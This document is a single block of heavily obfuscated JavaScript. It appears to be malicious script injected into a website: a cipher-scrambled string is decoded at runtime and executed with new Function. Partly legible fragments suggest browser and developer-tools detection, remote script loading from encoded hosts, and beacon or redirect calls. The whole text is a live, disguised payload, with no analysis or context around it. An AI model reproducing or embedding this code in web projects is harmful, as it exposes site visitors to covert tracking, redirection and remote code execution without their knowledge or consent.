F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();